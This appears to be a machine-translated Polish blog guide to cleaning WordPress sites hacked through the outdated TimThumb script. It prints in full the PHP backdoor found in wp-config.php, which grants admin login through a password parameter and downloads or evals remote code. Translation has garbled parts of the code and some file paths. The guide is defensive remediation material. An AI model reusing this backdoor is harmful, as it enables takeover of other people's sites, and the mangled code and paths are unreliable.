Jeśli dobrze pamiętasz, w sierpniu wystąpił problem z zabezpieczeniami skryptu TimThumb, który został naprawiony. Jednak nadal ku naszemu zaskoczeniu, wiele stron nadal korzysta ze starej wersji. Naprawiliśmy do tej pory trzy witryny w ciągu ostatniego miesiąca, jeden był wczoraj. Dlatego warto po prostu napisać artykuł krok po kroku, aby nasi użytkownicy mogli go po prostu śledzić. Wszyscy trzej użytkownicy, dla których naprawiamy ten problem, nawet nie wiedzieli, czym jest TimThumb ani czy go używają, czy nie.
TimThumb to skrypt PHP, który zmienia rozmiar obrazów. Była w nim luka, ale jest teraz bezpieczny w użyciu.
Skąd wiesz, że Twoja strona została zhakowana? Jeśli podczas odwiedzania witryny zobaczysz duży czerwony ekran w przeglądarce:
Jeśli zaczniesz bombardować e-mailami o przekierowaniu użytkowników z twojej witryny. Najprawdopodobniej Twoja strona padła ofiarą tego exploitu.
Jako środek ku przestrodze, każdy powinien po prostu użyć tego skanera luk w zabezpieczeniach Timthumb. Dzięki temu dowiesz się, czy używasz starszej wersji TimThumb. Wiele klubów tematycznych od razu ulepszyło swój rdzeń. Tak więc ta wtyczka sprawdzi, czy zainstalowana jest nowa BEZPIECZNA wersja Timthumb lub starsza wersja.
Teraz, jeśli Twoja strona już padła ofiarą tego exploita Timthumb, oto, co musisz zrobić.
Najpierw musisz usunąć następujące pliki:
/ wp-admin / upd.php / wp-content / upd.php
Zaloguj się do panelu administracyjnego WordPress i ponownie zainstaluj swoją wersję WordPress. W szczególności chcemy ponownie zainstalować te pliki:
/ wp-settings.php / wp-zawiera / js / jquery / jquery.js /wp-includes/js/110n.js
Następnie otwórz swój wp-config.php gdzie najprawdopodobniej znajdziesz Ten duży kod złośliwego oprogramowania, który zbiera dane logowania i pliki cookie. Ten kod będzie na dole.
if (isset ($_GET['pingnow'])& & isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']= = 'login') {
$user_login = 'admin';
$user = get_userdatabylogin ($user_login);
$user_id = $user - > ID;
wp_set_current_user ($user_id, $user_login);
wp_set_auth_cookie ($user_id);
do_action ('wp_login', $user_login);
}
if (($_GET['pingnow']= = 'exec')&&(isset ($_GET ['plik']))) {
$ch = curl_init($_GET['plik']);
$fnm = md5(rand(0,100)).'.php";
$fp = fopen($fnm, "w");
curl_setopt ($ch, CURLOPT_FILE, $fp);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
echo" < script LANGUAGE="JavaScript" >lokalizacja.href= '$fnm';</SCRIPT>";
}
if (($_GET['pingnow']= = 'eval')&&(isset ($_GET['plik']))) {
$ch = curl_init($_GET['plik']);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, true) ;
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec ($ch);
curl_close ($ch);
eval ($re);
}}}
W folderze motywu poszukaj miejsca, w którym skrypt TimThumb może przechowywać pliki w pamięci podręcznej. Zazwyczaj znajdują się one w tej strukturze:
/ wp-content/themes/themename/scripts/cache / external_{MD5Hash}.php
/ wp-content/themes/themename/temp/cache / external_{MD5Hash}.php
Usuń wszystko, co wygląda tak. Jeśli nie masz pewności co do rzeczy, Usuń wszystko, co nie jest plikiem obrazu.
Następną rzeczą, którą chcesz zrobić, to zastąpić timthumb.php z najnowszą wersją, którą można znaleźć na http://timthumb.googlecode.com/svn/trunk/timthumb.php
Teraz dobrym pomysłem byłoby zmienić hasła, zaczynając od danych logowania MySQL na dane logowania WordPress. Nie zapomnij zmienić hasła do MySQL w wp-config.php lub pojawi się ekran” Error Establishing Connection”.
Zmień tajne klucze w wp-config.plik php. Możesz wygenerować nowy klucz, przechodząc do generatora online.
Teraz jesteś skończony. Nie zapomnij opróżnić wszystkich wtyczek buforowania strony. Jako środek ostrzegawczy, dobrze jest wyczyścić pamięć podręczną przeglądarki i pliki cookie.
Dla programistów spróbuj użyć funkcji dodatkowych rozmiarów obrazów w WordPress, aby zastąpić funkcje Timthumb.
Daj nam znać, jeśli potrzebujesz dalszej pomocy, korzystając z naszego formularza kontaktowego.
